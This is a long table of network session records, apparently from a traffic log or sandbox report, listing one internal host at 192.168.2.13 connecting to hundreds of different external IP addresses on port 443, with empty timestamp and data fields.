                              Session IDSource IPSource PortDestination IPDestination Port
                              12000192.168.2.134574045.96.255.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12001192.168.2.135163668.35.4.211443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12002192.168.2.134768477.197.39.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12003192.168.2.1338776101.132.125.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12004192.168.2.135842617.221.231.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12005192.168.2.1353138103.28.16.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12006192.168.2.1351796199.172.207.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12007192.168.2.1358872119.246.110.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12008192.168.2.1338378196.113.17.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12009192.168.2.1343784122.212.48.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12010192.168.2.134584693.112.16.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12011192.168.2.1346998196.69.247.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12012192.168.2.135647265.34.223.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12013192.168.2.1340368211.10.157.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12014192.168.2.1352768102.75.189.91443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12015192.168.2.1349612108.22.58.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12016192.168.2.1346322145.248.233.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12017192.168.2.1356440130.150.3.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12018192.168.2.135116257.123.48.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12019192.168.2.1351776134.169.64.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12020192.168.2.1348340117.62.13.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12021192.168.2.1335082115.152.108.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12022192.168.2.1356006146.75.19.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12023192.168.2.135021832.34.5.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12024192.168.2.1356120138.93.193.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12025192.168.2.1352242176.118.182.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12026192.168.2.1360000131.244.252.32443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12027192.168.2.134743264.67.149.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12028192.168.2.1348254155.180.90.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12029192.168.2.1352006187.117.135.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12030192.168.2.1341946120.201.226.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12031192.168.2.134606217.143.196.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12032192.168.2.135875036.109.36.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12033192.168.2.1354118198.72.147.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12034192.168.2.1347342152.249.47.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12035192.168.2.134231061.238.102.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12036192.168.2.1349120105.93.241.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12037192.168.2.133426088.187.165.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12038192.168.2.1348396145.128.141.214443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12039192.168.2.134531478.102.136.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12040192.168.2.1333940202.61.235.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12041192.168.2.1335512173.15.60.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12042192.168.2.1355704184.0.103.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12043192.168.2.134618280.175.184.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12044192.168.2.1352420209.237.147.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12045192.168.2.133350896.77.145.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12046192.168.2.134882660.235.248.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12047192.168.2.1343978100.57.116.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12048192.168.2.1332954107.100.253.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12049192.168.2.1351092114.231.216.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12050192.168.2.1351872207.220.202.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12051192.168.2.133387431.2.217.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12052192.168.2.133567279.214.179.225443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12053192.168.2.133364236.41.178.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12054192.168.2.1360976168.53.167.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12055192.168.2.1335812162.28.15.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12056192.168.2.134663837.152.128.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12057192.168.2.1357452142.79.49.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12058192.168.2.1335254149.90.189.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12059192.168.2.135947471.105.254.173443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12060192.168.2.135009238.164.126.196443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12061192.168.2.1349712194.143.121.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12062192.168.2.135134657.5.71.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12063192.168.2.1351216142.113.83.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12064192.168.2.1359392161.109.89.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12065192.168.2.1338044149.49.46.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12066192.168.2.135770052.229.247.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12067192.168.2.1351602125.202.233.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12068192.168.2.133536813.76.59.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12069192.168.2.133625253.229.223.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12070192.168.2.1360012118.207.186.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12071192.168.2.1338328202.194.51.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12072192.168.2.135373024.160.17.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12073192.168.2.133325658.52.115.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12074192.168.2.1353360158.249.129.240443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12075192.168.2.13329409.55.70.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12076192.168.2.1341462165.134.97.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12077192.168.2.1344676128.155.246.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12078192.168.2.135218641.228.182.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12079192.168.2.1335668192.102.174.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12080192.168.2.1345958105.184.137.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12081192.168.2.1338154200.79.9.75443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12082192.168.2.1340914122.176.56.222443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12083192.168.2.136035835.20.142.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12084192.168.2.135100836.99.7.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12085192.168.2.1340404188.192.57.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12086192.168.2.135320438.208.244.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12087192.168.2.135996681.203.155.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12088192.168.2.1356266165.84.28.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12089192.168.2.1346690162.108.106.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12090192.168.2.134432454.230.6.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12091192.168.2.133748445.51.201.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12092192.168.2.1333428165.91.76.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12093192.168.2.1360720203.86.191.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12094192.168.2.133497454.147.45.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12095192.168.2.133600699.129.195.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12096192.168.2.133629643.222.225.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12097192.168.2.1334970111.37.50.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12098192.168.2.1359356132.129.156.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12099192.168.2.1342264192.211.247.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12100192.168.2.1343276165.204.166.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12101192.168.2.1357428203.98.87.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12102192.168.2.1340040201.237.250.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12103192.168.2.1344228207.248.77.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12104192.168.2.135794269.57.27.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12105192.168.2.133598232.240.139.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12106192.168.2.136074225.38.101.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12107192.168.2.1359194165.248.184.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12108192.168.2.1352624165.123.173.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12109192.168.2.135432825.129.25.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12110192.168.2.1338606196.73.244.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12111192.168.2.1354040106.16.243.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12112192.168.2.1340618222.249.2.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12113192.168.2.1335010132.254.16.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12114192.168.2.1342766216.37.134.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12115192.168.2.1336302199.76.79.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12116192.168.2.1350038200.157.34.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12117192.168.2.1355866117.126.243.150443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12118192.168.2.1343938180.216.178.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12119192.168.2.1354648220.93.176.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12120192.168.2.134656069.112.179.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12121192.168.2.1335958118.217.151.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12122192.168.2.1353876162.234.90.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12123192.168.2.1342790119.66.36.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12124192.168.2.133705478.58.254.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12125192.168.2.135104469.48.159.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12126192.168.2.13539524.251.46.105443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12127192.168.2.1338612128.12.23.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12128192.168.2.1349156170.164.88.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12129192.168.2.1352672211.244.182.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12130192.168.2.136039832.163.187.192443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12131192.168.2.133458453.172.221.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12132192.168.2.1336052183.83.193.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12133192.168.2.134803684.195.208.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12134192.168.2.1342258167.154.111.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12135192.168.2.1336020216.236.15.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12136192.168.2.1345694167.198.171.82443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12137192.168.2.1357224185.128.84.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12138192.168.2.135553898.65.86.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12139192.168.2.1349878221.162.131.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12140192.168.2.135528246.54.127.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12141192.168.2.136004264.138.169.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12142192.168.2.13431148.8.75.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12143192.168.2.136089684.5.11.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12144192.168.2.1346580178.32.178.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12145192.168.2.135572038.94.191.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12146192.168.2.1350986198.63.169.129443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12147192.168.2.1348404120.87.165.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12148192.168.2.1341272175.106.4.187443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12149192.168.2.1337910101.67.225.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12150192.168.2.1355780139.31.142.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12151192.168.2.1349044165.25.76.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12152192.168.2.13443121.70.180.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12153192.168.2.1359192142.143.32.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12154192.168.2.1346114219.125.7.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12155192.168.2.13429725.72.226.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12156192.168.2.135972214.137.77.30443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12157192.168.2.1349786176.220.223.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12158192.168.2.1351694182.25.155.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12159192.168.2.135744266.106.253.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12160192.168.2.1342450109.168.133.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12161192.168.2.1349982175.68.177.95443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12162192.168.2.136027236.57.84.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12163192.168.2.1342926140.114.53.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12164192.168.2.1356702173.50.190.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12165192.168.2.1335184208.82.209.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12166192.168.2.1343606141.204.25.77443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12167192.168.2.135257871.72.245.103443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12168192.168.2.133812679.30.16.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12169192.168.2.1354920117.32.154.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12170192.168.2.134468864.235.13.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12171192.168.2.1352408151.199.229.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12172192.168.2.1353682126.58.169.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12173192.168.2.133682827.219.18.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12174192.168.2.134208296.169.2.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12175192.168.2.135885087.133.45.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12176192.168.2.134999640.185.57.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12177192.168.2.134666841.42.115.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12178192.168.2.134992488.80.83.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12179192.168.2.134317666.149.180.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12180192.168.2.135941091.42.235.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12181192.168.2.135278651.197.61.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12182192.168.2.1350172158.252.126.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12183192.168.2.1347674223.230.140.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12184192.168.2.1347448111.193.150.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12185192.168.2.135914023.251.162.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12186192.168.2.1353556107.125.237.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12187192.168.2.134737823.233.0.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12188192.168.2.135104247.146.119.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12189192.168.2.135094627.140.71.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12190192.168.2.134131825.132.72.154443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12191192.168.2.1333692128.46.68.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12192192.168.2.1357230120.47.5.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12193192.168.2.1360290124.225.98.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12194192.168.2.133575099.106.87.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12195192.168.2.1348534206.110.91.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12196192.168.2.1352044116.72.133.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12197192.168.2.1338386182.96.130.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12198192.168.2.133990448.128.223.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12199192.168.2.1358078136.132.211.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12200192.168.2.1338014200.98.150.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12201192.168.2.136050697.203.233.71443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12202192.168.2.13364665.233.119.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12203192.168.2.1343994219.243.225.27443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12204192.168.2.135609850.181.128.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12205192.168.2.134538692.244.217.207443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12206192.168.2.1343120108.151.34.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12207192.168.2.1354520116.52.64.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12208192.168.2.1342182102.205.68.43443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12209192.168.2.1348346207.83.200.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12210192.168.2.1359694211.93.109.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12211192.168.2.1340770134.93.238.38443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12212192.168.2.133991462.126.25.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12213192.168.2.1350562201.240.143.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12214192.168.2.1342240162.16.93.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12215192.168.2.1341118204.41.90.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12216192.168.2.1360514191.74.235.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12217192.168.2.1337512170.177.23.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12218192.168.2.1356912111.163.213.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12219192.168.2.134921045.240.226.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12220192.168.2.1333906191.139.182.220443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12221192.168.2.1345692145.165.238.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12222192.168.2.1352828166.226.137.72443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12223192.168.2.133304670.100.239.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12224192.168.2.1340066119.212.242.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12225192.168.2.134498036.66.147.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12226192.168.2.135771286.185.58.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12227192.168.2.135969872.62.125.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12228192.168.2.134608459.232.116.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12229192.168.2.134804818.77.192.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12230192.168.2.133755487.137.135.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12231192.168.2.135462814.32.137.175443
                              TimestampBytes transferredDirectionData


